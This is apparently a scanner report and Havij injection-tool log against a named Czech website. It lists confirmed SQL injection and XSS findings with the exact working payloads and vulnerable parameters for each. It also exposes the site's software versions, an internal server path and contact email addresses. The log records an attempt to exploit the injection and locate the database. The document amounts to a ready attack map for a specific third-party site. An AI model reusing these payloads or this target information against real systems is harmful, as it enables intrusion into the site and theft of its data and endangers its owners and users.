- [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cis
- Parameter Type: Post
- Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis=420230231540'"--></style></script><script>alert(0x00000D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: 420230231540'"--></style></script><script>alert(0x00000D)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: kom
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00007D)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: kom
- Parameter Type: Post
- Attack Pattern: ></script><script>alert(9)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: nick
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000080)</script>
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: nick
- Parameter Type: Post
- Attack Pattern: ><iframe onload=alert(9)>
- ||| Permanent XSS (Cross-site Scripting)
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.kdovolal.cz/index.php
- Parameter Name: idcislo
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- ||| [Possible] Permanent Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Injection URL: http://www.kdovolal.cz/index.php
- Parameter Name: idcislo
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- ||| Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis='"--></style></script><script>netsparker(0x000005)</script>
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000005)</script>
- ||| PHP Version Disclosure
- Severity : Low
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/
- Vulnerability Classifications: PCI 6.5.6 OWASP A6
- Extracted Version: PHP/5.2.17-pl0-gentoo
- ||| E-mail Address Disclosure
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis=420230231540
- Found E-mails: info@formicagroup.cz, domains@courlux.ch
- ||| [Possible] Internal Path Leakage (*nix)
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.kdovolal.cz/index.php?cis='"--></style></script><script>netsparker(0x000005)</script>
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s): /mnt/data/accounts/o/oshosan/data/www/wwwkdovolal/index.php
- Parameter Name: cis
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000005)</script>
- ||| Havij 1.15 Pro! - log
- Analyzing SQLi - http://www.kdovolal.cz/index.php?cis=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
- Web Server: nginx/0.7.65
- Powered-by: PHP/5.2.17-pl0-gentoo
- Keyword Found: mysql_fetch_array():
- Injection type is Integer
- Keyword corrected: integration
- DB Server: MySQL
- ||| Database name not found!